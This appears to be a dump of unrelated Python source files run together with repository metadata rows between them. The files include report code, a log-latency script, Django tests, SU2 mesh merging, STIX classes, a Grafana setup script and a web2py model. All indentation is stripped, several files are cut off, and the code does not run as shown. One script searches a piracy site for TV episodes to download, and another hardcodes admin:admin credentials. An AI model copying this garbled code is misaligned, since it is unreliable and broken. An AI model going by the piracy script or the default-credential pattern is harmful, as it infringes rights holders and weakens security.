show_table = False
show_chart = False
title = ''
slug = ''
use_datatables = False
def __init__(self, config=None):
self.config = config or {}
super(EWSData, self).__init__()
def percent_fn(self, x, y):
return "%(p).2f%%" % \
{
"p": (100 * float(y or 0) / float(x or 1))
}
@property
def headers(self):
return []
@property
def location_id(self):
return self.config.get('location_id')
@property
def location(self):
location_id = self.location_id
if not location_id:
return None
return SQLLocation.objects.get(location_id=location_id)
@property
def rows(self):
raise NotImplementedError
@property
def domain(self):
return self.config.get('domain')
@memoized
def reporting_types(self):
return [
location_type.name
for location_type in Domain.get_by_name(self.domain).location_types
if not location_type.administrative
]
@property
def sublocations(self):
location = Location.get(self.config['location_id'])
if location.children:
return location.children
else:
return [location]
def unique_products(self, locations, all=False):
products = list()
for loc in locations:
if self.config['products'] and not all:
products.extend([p for p in loc.products if p.product_id in self.config['products'] and
not p.is_archived])
elif self.config['program'] and not all:
products.extend([p for p in loc.products if p.program_id == self.config['program'] and
not p.is_archived])
else:
products.extend(p for p in loc.products if not p.is_archived)
return sorted(set(products), key=lambda p: p.code)
class ReportingRatesData(EWSData):
def get_supply_points(self, location_id=None):
location = SQLLocation.objects.get(location_id=location_id) if location_id else self.location
location_types = self.reporting_types()
if location.location_type.name == 'district':
locations = SQLLocation.objects.filter(parent=location)
elif location.location_type.name == 'region':
locations = SQLLocation.objects.filter(
Q(parent__parent=location) | Q(parent=location, location_type__name__in=location_types)
)
elif location.location_type in location_types:
locations = SQLLocation.objects.filter(id=location.id)
else:
locations = SQLLocation.objects.filter(
domain=self.domain,
location_type__name__in=location_types,
parent=location
)
return locations.exclude(supply_point_id__isnull=True).exclude(is_archived=True)
def supply_points_list(self, location_id=None):
return self.get_supply_points(location_id).values_list('supply_point_id')
def reporting_supply_points(self, supply_points=None):
all_supply_points = self.get_supply_points().values_list('supply_point_id', flat=True)
supply_points = supply_points if supply_points else all_supply_points
return StockTransaction.objects.filter(
case_id__in=supply_points,
report__date__range=[self.config['startdate'], self.config['enddate']]
).distinct('case_id').values_list('case_id', flat=True)
def datetext(self):
today = datetime.utcnow().replace(hour=0, minute=0, second=0, microsecond=0)
return "last %d days" % (today - self.config['startdate']).days if today == self.config['enddate'] else\
"%s to %s" % (self.config['startdate'].strftime("%Y-%m-%d"),
self.config['enddate'].strftime("%Y-%m-%d"))
@memoized
def all_reporting_locations(self):
return SQLLocation.objects.filter(
domain=self.domain, location_type__name__in=self.reporting_types(), is_archived=False
).values_list('supply_point_id', flat=True)
class MultiReport(CustomProjectReport, CommtrackReportMixin, ProjectReportParametersMixin, DatespanMixin):
title = ''
report_template_path = "ewsghana/multi_report.html"
flush_layout = True
split = True
exportable = True
is_exportable = False
base_template = 'ewsghana/base_template.html'
@classmethod
def get_url(cls, domain=None, render_as=None, **kwargs):
url = super(MultiReport, cls).get_url(domain=domain, render_as=None, kwargs=kwargs)
request = kwargs.get('request')
user = getattr(request, 'couch_user', None)
if user:
dm = user.get_domain_membership(domain)
if dm.program_id:
program_id = dm.program_id
else:
program_id = 'all'
url = '%s?location_id=%s&filter_by_program=%s' % (
url,
dm.location_id if dm.location_id else '',
program_id if program_id else ''
)
return url
@property
@memoized
def rendered_report_title(self):
return self.title
@property
@memoized
def data_providers(self):
return []
@property
def report_config(self):
return dict(
domain=self.domain,
startdate=self.datespan.startdate,
enddate=self.datespan.enddate,
location_id=self.request.GET.get('location_id'),
)
def report_filters(self):
return [f.slug for f in self.fields]
def fpr_report_filters(self):
return [f.slug for f in [AsyncLocationFilter, ProductByProgramFilter, DatespanFilter]]
@property
def report_context(self):
context = {
'reports': [self.get_report_context(dp) for dp in self.data_providers],
'title': self.title,
'split': self.split,
'r_filters': self.report_filters(),
'fpr_filters': self.fpr_report_filters(),
'exportable': self.is_exportable,
'location_id': self.request.GET.get('location_id'),
}
return context
def get_report_context(self, data_provider):
total_row = []
headers = []
rows = []
if not self.needs_filters and data_provider.show_table:
headers = data_provider.headers
rows = data_provider.rows
context = dict(
report_table=dict(
title=data_provider.title,
slug=data_provider.slug,
headers=headers,
rows=rows,
total_row=total_row,
start_at_row=0,
use_datatables=data_provider.use_datatables,
),
show_table=data_provider.show_table,
show_chart=data_provider.show_chart,
charts=data_provider.charts if data_provider.show_chart else [],
chart_span=12,
)
return context
def is_reporting_type(self):
if not self.report_config.get('location_id'):
return False
sql_location = SQLLocation.objects.get(location_id=self.report_config['location_id'], is_archived=False)
reporting_types = [
location_type.name
for location_type in Domain.get_by_name(self.domain).location_types
if not location_type.administrative
]
return sql_location.location_type.name in reporting_types
@property
def export_table(self):
r = self.report_context['reports'][0]['report_table']
return [self._export_table(r['title'], r['headers'], r['rows'])]
# Export for Facility Page Report, which occurs in every multireport
def _export_table(self, export_sheet_name, headers, formatted_rows, total_row=None):
def _unformat_row(row):
return [col.get("sort_key", col) if isinstance(col, dict) else col for col in row]
table = headers.as_export_table
rows = [_unformat_row(row) for row in formatted_rows]
# Removing html icon tag from MOS column
for row in rows:
row[1] = GenericTabularReport._strip_tags(row[1])
replace = ''
for k, v in enumerate(table[0]):
if v != ' ':
replace = v
else:
table[0][k] = replace
table.extend(rows)
if total_row:
table.append(_unformat_row(total_row))
return [export_sheet_name, table]
class ProductSelectionPane(EWSData):
slug = 'product_selection_pane'
show_table = True
title = 'Select Products'
use_datatables = True
@property
def rows(self):
locations = get_supply_points(self.config['location_id'], self.config['domain'])
products = self.unique_products(locations, all=True)
programs = {program.get_id: program.name for program in Program.by_domain(self.domain)}
headers = []
if 'report_type' in self.config:
from custom.ewsghana.reports.specific_reports.stock_status_report import MonthOfStockProduct
headers = [h.html for h in MonthOfStockProduct(self.config).headers]
result = [
[
'<input class=\"toggle-column\" name=\"{1} ({0})\" data-column={2} value=\"{0}\" type=\"checkbox\"'
'{3}>{1} ({0})</input>'.format(
p.code, p.name, idx if not headers else headers.index(p.code) if p.code in headers else -1,
'checked' if self.config['program'] is None or self.config['program'] == p.program_id else ''),
programs[p.program_id], p.code
] for idx, p in enumerate(products, start=1)
]
result.sort(key=lambda r: (r[1], r[2]))
current_program = result[0][1] if result else ''
rows = [['<div class="program">%s</div>' % current_program]]
for r in result:
if r[1] != current_program:
rows.append(['<div class="program">%s</div>' % r[1]])
current_program = r[1]
rows.append([r[0]])
return rows
| bsd-3-clause | -9,058,818,260,958,323,000 | 35.636364 | 115 | 0.608967 | false |
khosrow/metpx | sundew/lib/PDSLatencies.py | 1 | 7398 | #!/usr/bin/env python
"""
MetPX Copyright (C) 2004-2006 Environment Canada
MetPX comes with ABSOLUTELY NO WARRANTY; For details type see the file
named COPYING in the root of the source directory tree.
"""
"""
#############################################################################################
# Name: PDSLatencies
#
# Author: Daniel Lemay
#
# Date: 2005-09-13
#
# Description: Calculate latencies for a product (MPCN for example) sent to
# a PDS client (wxo-b1 for example)
#
#############################################################################################
"""
import sys, os, os.path, commands, fnmatch
import PXPaths, dateLib
from Latencies import Latencies
class PDSLatencies(Latencies):
def __init__(self, nopull=False, keep=False, date=None, pattern='ACC', machines=['pds1', 'pds2', 'pds3', 'pds4'], sources=['pdschkprod'], client='wxo-b1-oper-ww', xstats=False):
Latencies.__init__(self, nopull, keep, date, xstats) # Parent Constructor
self.pattern = pattern # Products that we want to match
self.machines = machines # Machines were the logs can be found
self.sources = sources # Sources for which we will check arrival time of the products
self.client = client # Client for which we will check delivery time of the products (ONLY ONE ENTRY in the list)
self.system = 'PDS'
if not self.nopull:
self.obtainFiles()
self.start()
if not self.keep:
self.eraseFiles()
def obtainFiles(self):
date = self.date
# Used for xferlog
(dummy, month, day) = dateLib.getISODateParts(date)
if day[0] == '0':
day = ' ' + day[1]
monthAbbrev = dateLib.getMonthAbbrev(month)
LOG = '/apps/pds/log/'
for machine in self.machines:
self.manager.createDir(PXPaths.LAT_TMP + machine + '_' + self.random)
for source in self.sources:
command = 'scp -q %s:%s %s' % (machine, LOG + source + '.' + date, PXPaths.LAT_TMP + machine + '_' + self.random)
(status, output) = commands.getstatusoutput(command)
command = 'scp -q %s:%s %s' % (machine, LOG + self.client + '.' + date, PXPaths.LAT_TMP + machine + '_' + self.random)
(status, output) = commands.getstatusoutput(command)
# xferlog data
if self.xstats:
command = "ssh %s grep -h -e \"'%s %s'\" /var/log/xferlog /var/log/xferlog.?" % (machine, monthAbbrev, day)
(status, output) = commands.getstatusoutput(command)
xferlog = open(PXPaths.LAT_TMP + machine + '_' + self.random + '/xferlog_paplat', 'w')
xferlog.write(output)
xferlog.close()
def extractGoodLines(self, prefix, good):
date = self.date
for machine in self.machines:
hostOnly = machine.split('.')[0]
lines = []
xferlogLines = []
dirPath = PXPaths.LAT_TMP + machine + '_' + self.random
try:
files = os.listdir(dirPath)
except OSError:
print "%s doesn't exist!\nDon't use -n|--nopull option if you don't have some data." % dirPath
sys.exit(1)
if prefix == 'rx':
for file in [x for x in files if x == 'pdschkprod.%s' % (date)]:
lines.extend(open(dirPath + '/' + file).readlines())
if self.xstats:
for file in [x for x in files if x == 'xferlog_paplat']:
xferlogLines.extend(open(dirPath + '/' + file).readlines())
if self.pattern == '__ALL__':
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, '*Written*')))
if self.xstats:
self.goodXferlog.extend(map(lambda x: (x, hostOnly), xferlogLines))
else:
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, '*Written*%s*' % (self.pattern))))
if self.xstats:
self.goodXferlog.extend(map(lambda x: (x, hostOnly), fnmatch.filter(xferlogLines, '*%s*' % (self.pattern))))
if prefix == 'tx':
for file in [x for x in files if x == '%s.%s' % (self.client, date)]:
lines.extend(open(dirPath + '/' + file).readlines())
if self.pattern == '__ALL__':
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, 'INFO*sent to*')))
else:
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, 'INFO*%s*sent to*' % (self.pattern))))
def extractInfos(self, prefix, good, infos):
if prefix == 'rx':
#print("GOOD RX: %i" % len(good))
for (line, machine) in good:
parts = line.split()
hhmmss = parts[3][:-1]
date = '%s %s' % (self.dateDashed, hhmmss)
if self.xstats:
# Remove ::20050918000030
filename_parts = os.path.split(parts[9])[1].split(':')
filename = ':'.join(filename_parts[:-2])
else:
filename = os.path.split(parts[9])[1]
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
infos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
#print len(infos)
self.goodRx = []
# xferlog stuff
for (line, machine) in self.goodXferlog:
parts = line.split()
hhmmss = parts[3]
date = '%s %s' % (self.dateDashed, hhmmss)
filename = os.path.split(parts[8])[1]
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
self.xferlogInfos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
self.goodXferlog = []
if prefix == 'tx':
#print("GOOD TX: %i" % len(good))
for (line, machine) in good:
parts = line.split()
hhmmss = parts[3][:-1]
date = '%s %s' % (self.dateDashed, hhmmss)
if self.xstats:
# Remove ::20050918020123:pds4
filename_parts = parts[7].split(':')
filename = ':'.join(filename_parts[:-3])
else:
# Only remove machine name
filename_parts = parts[7].split(':')
filename = ':'.join(filename_parts[:-1])
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
infos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
#print len(infos)
self.goodTx = []
"""
print "*************************************** RX ********************************"
for tuple in self.goodRx:
print (tuple[0].strip(), tuple[1])
print "*************************************** TX ********************************"
for tuple in self.goodTx:
print (tuple[0].strip(), tuple[1])
"""
if __name__ == '__main__':
latencier = PDSLatencies()
| gpl-2.0 | -795,901,474,159,940,700 | 42.011628 | 181 | 0.499594 | false |
CodeYellowBV/django-binder | tests/test_set_nullable_relation.py | 1 | 2202 | from binder.exceptions import BinderValidationError
from binder.router import Router
from binder.views import ModelView
from .testapp.views import AnimalView
from .testapp.models import Animal, Caretaker
from django.test import TestCase
class TestSetNullableRelations(TestCase):
def test_standard_filling_in_relation_to_existing_model(self):
animal = Animal.objects.create(name='foo')
caretaker = Caretaker.objects.create(name='bar')
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
animal_view._store(animal, {'caretaker': caretaker.pk}, FakeRequest())
self.assertEqual(animal.caretaker, caretaker)
def test_filling_in_relation_to_existing_model_after_evaulation(self):
animal = Animal.objects.create(name='foo')
caretaker = Caretaker.objects.create(name='bar')
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
assert animal.caretaker is None
animal_view._store(animal, {'caretaker': caretaker.pk}, FakeRequest())
self.assertEqual(animal.caretaker, caretaker)
def test_setting_none_existing_caretaker_gives_validation_error(self):
animal = Animal.objects.create(name='foo', caretaker=Caretaker.objects.create(name='bar2'))
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
animal.caretaker
with self.assertRaises(BinderValidationError):
animal_view._store(animal, {'caretaker': -1}, FakeRequest())
| mit | 7,358,221,550,644,352,000 | 26.185185 | 99 | 0.624886 | false |
jonDel/torrents_manager | example.py | 1 | 4439 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import config,re,time
from tpb import TPB
from tpb import CATEGORIES, ORDERS
import OpenSubtitles
import logging
import gzip, os
import transmissionrpc
logging.basicConfig(level=logging.DEBUG)
uploaders = config.ConfigSectionMap("torrent_uploaders")
episode = config.ConfigSectionMap("series")['supernatural']
print "episode is "+episode
down_dir = config.ConfigSectionMap("dir")['series_dir']
print "down_dir is "+down_dir
def return_torrent_name(torrent_name):
torrent= re.search('s([0-2][0-9])e([0-2][0-9]).*(720|1080)', torrent_name, re.I)
ret = {}
try:
torrent_season = torrent.group(1)
torrent_episode = torrent.group(2)
try:
torrent.group(3)
ret = {'is_valid':True,'hd_quality':True,'season':torrent_season,'episode':torrent_episode}
except:
#print 'Não tem torrent de boa qualidade'
ret = ['False', 'False', torrent_season, torrent_episode]
ret = {'is_valid':True,'hd_quality':False,'season':torrent_season,'episode':torrent_episode}
except:
ret = {'is_valid':False,'hd_quality':False}
#print 'Não tem torrent com a temporada/episodio desejado'
return ret
#t = TPB('https://thepiratebay.org')
#first_page = t.search('supernatural').order(ORDERS.SEEDERS.DES).page(0)
def get_torrent_from_page(page):
for torrents in page:
break_tor = False
try:
#print "torrent is "+str(torrents)
ess
except:
pass
torrent_reg = return_torrent_name(torrents.title)
if (torrent_reg['is_valid'] and torrent_reg['hd_quality']):
if episode == ('s'+torrent_reg['season']+'e'+torrent_reg['episode']):
print 'Agora falta testar se o uploader é bagual'
for uploader in uploaders:
#print 'uploader is '+torrents.user
#print 'uploader configured is '+uploader
if uploader == torrents.user:
print 'OK!!! torrent title is '+torrents.title
print 'OK!!! torrent files is '+str(torrents.files)
print 'uploader is '+torrents.user
print 'number of leechers is '+ str(torrents.leechers)
print 'number of seeders is '+ str(torrents.seeders)
break_tor= True
# achei o uploader certo, quebro o loop agora
break
else:
print 'nao quero coisa de uploader desconhecido'
else:
#print 'Não corresponde ao episodio que queremos. TODO: pegar mais páginas'
pass
# achei o torrent certo, quebro o loop agora
if break_tor:
break
return torrents
#for torrents in first_page:
# print 'torrent is '+str(torrents)
# print 'OK!!! torrent title is '+torrents.title
# print 'OK!!! torrent files is '+str(torrents.files)
# print 'uploader is '+torrents.user
# print 'number of leechers is '+ str(torrents.leechers)
# print 'number of seeders is '+ str(torrents.seeders)
#tor_chosen = get_torrent_from_page(first_page)
#print a[0].magnet_link
#for t in a:
# print t
# print t.magnet_link
# print t.size
# print t.user
# print t.leechers
# print t.seeders
# break
# #print a.file
# -*- coding: utf-8 -*-
tc = transmissionrpc.Client('localhost', port=9091)
print tc.get_torrents()
##tc.stop_torrent(1)
##tc.start_torrent(1)
#iny=0
for tor in tc.get_torrents():
print tor.status
print tor
print tor.id
#print tor.magnet_link
#print tor.size
#print tor.user
#print tor.leechers
#print tor.seeders
#print tor.files()
filesr = tor.files()
print filesr
print filesr[0]['name' ]
for files in filesr:
print filesr[files]['name']
#print files
#print a.file
#
##tc.remove_torrent(1)
##tc.remove_torrent(1)
#tc.add_torrent('magnet:?xt=urn:btih:7C9F535CC79E852B6C7707CA5FD6E44908EE4867&dn=the+big+bang+theory+s07e22+hdtv+x264+lol+ettv&tr=http%3A%2F%2Ftracker.trackerfix.com%2Fannounce&tr=udp%3A%2F%2Fopen.demonii.com%3A1337', download_dir = down_dir)
##tc.add_torrent(None,filename=tor_chosen.magnetLink, download_dir = down_dir)
#atr=tc.add_torrent(tor_chosen.magnet_link, download_dir = down_dir)
#for tor in tc.get_torrents():
# print tor.status
# id = tor.id
#print 'id is '+str(id)
#try:
# tre = tc.get_torrent(id)
# #print "transmission-dir = "+tre.comment
# print "name = "+tre.name
# print "commnet = "+tre.downloadDir
# print 'files = '+str(tc.get_files())
# #print "files = "+str(tre.files())
# #for file in tre.files:
# # print 'file is '+str(file)
#except:
# raise
# pass
#print tc.get_torrents ()
#time.sleep(3)
##print tor.magnetLink
#for tor in tc.get_torrents():
# tor.update()
# print tor.status
##print tor.status # downloading, seeding
| gpl-3.0 | -1,485,059,765,586,805,000 | 27.980392 | 242 | 0.695535 | false |
EduardoMolina/SU2 | SU2_PY/SU2/run/merge.py | 1 | 3218 | ## \file merge.py
# \brief python package for merging meshes
# \author T. Economon, T. Lukaczyk, F. Palacios
# \version 7.0.3 "Blackbird"
#
# SU2 Project Website: https://su2code.github.io
#
# The SU2 Project is maintained by the SU2 Foundation
# (http://su2foundation.org)
#
# Copyright 2012-2020, SU2 Contributors (cf. AUTHORS.md)
#
# SU2 is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# SU2 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SU2. If not, see <http://www.gnu.org/licenses/>.
# ----------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------
import os, sys, shutil, copy
from .. import io as su2io
from .interface import SOL as SU2_SOL
from .interface import SOL_FSI as SU2_SOL_FSI
# ----------------------------------------------------------------------
# Merge Mesh
# ----------------------------------------------------------------------
def merge( config ):
""" info = SU2.run.merge(config)
Merges mesh with:
SU2.run.SOL() (volume merging)
internal scripts (surface merging)
Assumptions:
config.NUMBER_PART is set
Skip if config.NUMBER_PART > 1
Inputs:
config - an SU2 config
Ouputs:
info - an empty SU2 State
Executes in:
./
"""
# local copy
konfig = copy.deepcopy(config)
# check if needed
partitions = konfig['NUMBER_PART']
if partitions <= 1:
return su2io.State()
# special cases
special_cases = su2io.get_specialCases(konfig)
# special cases
multizone_cases = su2io.get_multizone(konfig)
# # MERGING # #
if 'FLUID_STRUCTURE_INTERACTION' in multizone_cases:
merge_multizone(konfig)
else:
if 'WRT_UNSTEADY' in special_cases:
merge_unsteady(konfig)
else:
merge_solution(konfig)
# info out (empty)
info = su2io.State()
return info
#: merge
def merge_unsteady( config, begintime=0, endtime=None ):
if not endtime:
endtime = config.EXT_ITER
# SU2_SOL handles unsteady volume merge
merge_solution( config )
return
#: def merge_unsteady()
def merge_solution( config ):
""" SU2.io.merge.merge_solution(config)
general volume surface merging with SU2_SOL
"""
SU2_SOL( config )
return
#: merge_solution( config )
def merge_multizone( config, begintime=0, endtime=None ):
if not endtime:
endtime = config.TIME_ITER
SU2_SOL_FSI( config )
return
#: merge_solution( config )
| lgpl-2.1 | 4,733,021,594,699,282,000 | 25.377049 | 72 | 0.568676 | false |
EliotBerriot/django-dynamic-preferences | tests/test_manager.py | 1 | 3314 | from __future__ import unicode_literals
from django.test import TestCase
from django.core.cache import caches
from django.urls import reverse
from django.contrib.auth.models import User
from dynamic_preferences.registries import (
global_preferences_registry as registry
)
from dynamic_preferences.models import GlobalPreferenceModel
class BaseTest(object):
def tearDown(self):
caches['default'].clear()
class TestPreferences(BaseTest, TestCase):
def test_can_get_preferences_objects_from_manager(self):
manager = registry.manager()
cached_prefs = dict(manager.all())
qs = manager.queryset
self.assertEqual(
len(qs),
len(cached_prefs)
)
self.assertEqual(
list(qs),
list(GlobalPreferenceModel.objects.all())
)
def test_can_get_db_pref_from_manager(self):
manager = registry.manager()
manager.queryset.delete()
pref = manager.get_db_pref(section='test', name='TestGlobal1')
self.assertEqual(pref.section, 'test')
self.assertEqual(pref.name, 'TestGlobal1')
self.assertEqual(
pref.raw_value, registry.get('test__TestGlobal1').default)
def test_do_not_restore_default_when_calling_all(self):
manager = registry.manager()
new_value = 'test_new_value'
manager['test__TestGlobal1'] = new_value
self.assertEqual(manager['test__TestGlobal1'], new_value)
caches['default'].clear()
manager.all()
caches['default'].clear()
self.assertEqual(manager['test__TestGlobal1'], new_value)
self.assertEqual(manager.all()['test__TestGlobal1'], new_value)
def test_invalidates_cache_when_saving_database_preference(self):
manager = registry.manager()
caches['default'].clear()
new_value = 'test_new_value'
key = manager.get_cache_key('test', 'TestGlobal1')
manager['test__TestGlobal1'] = new_value
pref = manager.get_db_pref(section='test', name='TestGlobal1')
self.assertEqual(pref.raw_value, new_value)
self.assertEqual(manager.cache.get(key), new_value)
pref.raw_value = 'reset'
pref.save()
self.assertEqual(manager.cache.get(key), 'reset')
def test_invalidates_cache_when_saving_from_admin(self):
admin = User(
username="admin",
email="[email protected]",
is_superuser=True,
is_staff=True)
admin.set_password('test')
admin.save()
self.client.login(username='admin', password="test")
manager = registry.manager()
pref = manager.get_db_pref(section='test', name='TestGlobal1')
url = reverse(
'admin:dynamic_preferences_globalpreferencemodel_change',
args=(pref.id,)
)
key = manager.get_cache_key('test', 'TestGlobal1')
response = self.client.post(url, {'raw_value': 'reset1'})
self.assertEqual(manager.cache.get(key), 'reset1')
self.assertEqual(manager.all()['test__TestGlobal1'], 'reset1')
response = self.client.post(url, {'raw_value': 'reset2'})
self.assertEqual(manager.cache.get(key), 'reset2')
self.assertEqual(manager.all()['test__TestGlobal1'], 'reset2')
| bsd-3-clause | -1,961,682,040,945,668,000 | 32.14 | 71 | 0.629451 | false |
STIXProject/python-stix | stix/core/stix_header.py | 1 | 5004 | # Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import fields
import stix
from stix.utils import deprecated
from stix.common import InformationSource, StructuredTextList, Profiles
from stix.common.vocabs import VocabField, PackageIntent
from stix.data_marking import Marking
import stix.bindings.stix_core as stix_core_binding
class STIXHeader(stix.Entity):
"""The STIX Package Header.
Args:
handling: The data marking section of the Header.
information_source: The :class:`.InformationSource` section of the
Header.
package_intents: **DEPRECATED**. A collection of :class:`.VocabString`
defining the intent of the parent :class:`.STIXPackage`.
description: **DEPRECATED**. A description of the intent or purpose
of the parent :class:`.STIXPackage`.
short_description: **DEPRECATED**. A short description of the intent
or purpose of the parent :class:`.STIXPackage`.
title: **DEPRECATED**. The title of the :class:`.STIXPackage`.
Attributes:
profiles: A collection of STIX Profiles the parent
:class:`.STIXPackage` conforms to.
title: **DEPRECATED**. The title of the parent :class:`.STIXPackage`.
"""
_binding = stix_core_binding
_binding_class = _binding.STIXHeaderType
_namespace = 'http://stix.mitre.org/stix-1'
title = fields.TypedField("Title", preset_hook=deprecated.field)
package_intents = VocabField("Package_Intent", PackageIntent, multiple=True, preset_hook=deprecated.field)
descriptions = fields.TypedField("Description", type_=StructuredTextList, preset_hook=deprecated.field)
short_descriptions = fields.TypedField("Short_Description", type_=StructuredTextList, preset_hook=deprecated.field)
handling = fields.TypedField("Handling", Marking)
information_source = fields.TypedField("Information_Source", InformationSource)
profiles = fields.TypedField("Profiles", Profiles)
def __init__(self, package_intents=None, description=None, handling=None,
information_source=None, title=None, short_description=None):
super(STIXHeader, self).__init__()
self.package_intents = package_intents
self.title = title
self.description = StructuredTextList(description)
self.short_description = StructuredTextList(short_description)
self.handling = handling
self.information_source = information_source
self.profiles = None
@property
def description(self):
"""**DEPRECATED**. A single description about the contents or
purpose of this object.
Default Value: ``None``
Note:
If this object has more than one description set, this will return
the description with the lowest ordinality value.
Returns:
An instance of
:class:`.StructuredText`
"""
return next(iter(self.descriptions), None)
@description.setter
def description(self, value):
self.descriptions = StructuredTextList(value)
def add_description(self, description):
"""**DEPRECATED**. Adds a description to the ``descriptions``
collection.
This is the same as calling "foo.descriptions.add(bar)".
"""
deprecated.warn(description)
self.descriptions.add(description)
@property
def short_description(self):
"""**DEPRECATED**. A single short description about the contents or
purpose of this object.
Default Value: ``None``
Note:
If this object has more than one short description set, this will
return the description with the lowest ordinality value.
Returns:
An instance of :class:`.StructuredText`
"""
return next(iter(self.short_descriptions), None)
@short_description.setter
def short_description(self, value):
self.short_descriptions = StructuredTextList(value)
def add_short_description(self, description):
"""**DEPRECATED**. Adds a description to the ``short_descriptions``
collection.
This is the same as calling "foo.short_descriptions.add(bar)".
"""
deprecated.warn(description)
self.short_descriptions.add(description)
def add_package_intent(self, package_intent):
"""**DEPRECATED**. Adds :class:`.VocabString` object to the
:attr:`package_intents` collection.
If the input is not an instance of :class:`.VocabString`, an effort
will be made to convert it into an instance of :class:`.PackageIntent`.
"""
deprecated.warn(package_intent)
self.package_intents.append(package_intent)
def add_profile(self, profile):
"""Adds a profile to the STIX Header. A Profile is represented by a
string URI.
"""
self.profiles.append(profile)
| bsd-3-clause | 8,210,940,760,186,117,000 | 34.489362 | 119 | 0.666267 | false |
moio/sumaform | salt/grafana/setup_grafana.py | 1 | 1107 | #!/usr/bin/env python
import base64
import errno
import httplib
import json
import socket
import sys
import time
def do(method, connection, headers, path, body=None):
connection.request(method, path, headers=headers, body=json.dumps(body))
resp = connection.getresponse()
content = resp.read()
if resp.status != 200:
raise IOError("Unexpected HTTP status received on %s: %d" % (path, resp.status))
return json.loads(content)
connection = httplib.HTTPConnection("localhost")
# try to connect, multiple times if ECONNREFUSED is raised
# (service is up but not ready for requests yet)
for retries in range(0,10):
try:
connection.connect()
except socket.error as e:
if e.errno != errno.ECONNREFUSED:
raise e
print("Connection refused, retrying...")
time.sleep(1)
token = base64.b64encode("admin:admin".encode("ASCII")).decode("ascii")
headers = {
"Authorization" : "Basic %s" % token,
"Content-Type" : "application/json; charset=utf8"
}
do("PUT", connection, headers, "/api/org/preferences", {"homeDashboardId" : 1})
| bsd-3-clause | 7,001,299,087,362,661,000 | 26 | 88 | 0.68112 | false |
RysavyD/platby | models/db_model.py | 1 | 5519 | # coding: utf8
import locale
from mz_wkasa_platby import fix_login, Uc_sa
# Uc_sa - id účtů účtové osnovy - při importu zde je vidí controléry i views
locale.setlocale(locale.LC_ALL, 'cs_CZ.UTF-8')
class IS_IN_DB_(IS_IN_DB):
def build_set(self):
super(IS_IN_DB_, self).build_set()
records = [(lbl, self.theset[pos]) for pos, lbl in enumerate(self.labels)]
records.sort(key=lambda x: locale.strxfrm(x[0]))
self.labels = [rec[0] for rec in records]
self.theset = [rec[1] for rec in records]
db.define_table('ucet',
Field('ucet', length=7),
Field('zkratka', length=3),
Field('nazev', length=100),
format='%(ucet)s - %(nazev)s'
)
db.define_table('kategorie',
Field('idma_dati', db.ucet),
Field('iddal', db.ucet),
Field('vyznam', default=''),
format='%(vyznam)s'
)
db.define_table('typp',
Field('zkratka', length=1),
Field('vyznam', length=40),
format='%(vyznam)s'
)
db.define_table('partner',
Field('idx', 'integer'), # foxpro id
Field('typp_id', db.typp),
Field('ucel', length=40),
Field('nazev', length=60),
Field('ulice', length=40),
Field('psc', length=5),
Field('misto', length=40),
Field('ico', length=10),
Field('kontakt', 'text'),
Field('poznamka', 'text'),
format='%(nazev)s, %(misto)s'
)
db.define_table('fp',
Field('idx', 'integer'), # foxpro id
Field('zauctovana', 'boolean', default=False),
Field('md', db.ucet, label=TFu('nákladový účet 5..'),
comment=TFu('pro zaúčtování faktury [MD=5..,Dal=321], pokud ještě nebylo provedeno')),
Field('partner_id', db.partner, ondelete='SETNULL',),
Field('ucet', length=20),
Field('elektronicky', 'boolean', default=True),
Field('castka', 'decimal(11,2)', default=0.00),
Field('zaloha', 'decimal(11,2)', default=0.00),
Field('no_jejich', length=20),
Field('vystaveno', 'date'),
Field('prijato', 'date'),
Field('splatnost', 'date'),
Field('uhrazeno', 'date'),
Field('zal_uhrazeno', 'date'),
Field('datum_akce', 'date'),
Field('uhrada', length=1),
Field('zal_uhrada', length=1),
Field('vs', length=10),
Field('ss', length=10),
Field('ks', length=4),
Field('vs_akce', length=5),
Field('popis', length=90),
Field('poznamka', 'text'),
format='%(vystaveno)s, %(castka)s, %(no_jejich)s'
)
db.define_table('pohyb',
Field('idauth_user', 'reference auth_user', label=TFu("Uživatel"),
requires=IS_EMPTY_OR(IS_IN_DB_(db, db.auth_user.id, '%(nick)s - %(vs)s'))),
Field('idorganizator', 'reference auth_user', label=TFu("Zadal organizátor"),
readable=False, writable=False,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.auth_user.id, '%(nick)s - %(vs)s'))),
Field('idma_dati', 'reference ucet'),
Field('iddal', 'reference ucet'),
Field('fp_id', db.fp,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.fp.id, db.fp._format)),
represent=lambda id, r=None: db.fp._format % db.fp(id) if id else '',
ondelete='SETNULL',
),
Field('partner_id', db.partner,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.partner.id, db.partner._format)),
represent=lambda id, r=None: db.partner._format % db.partner(id) if id else '',
ondelete='SETNULL',
),
Field('datum', 'datetime',
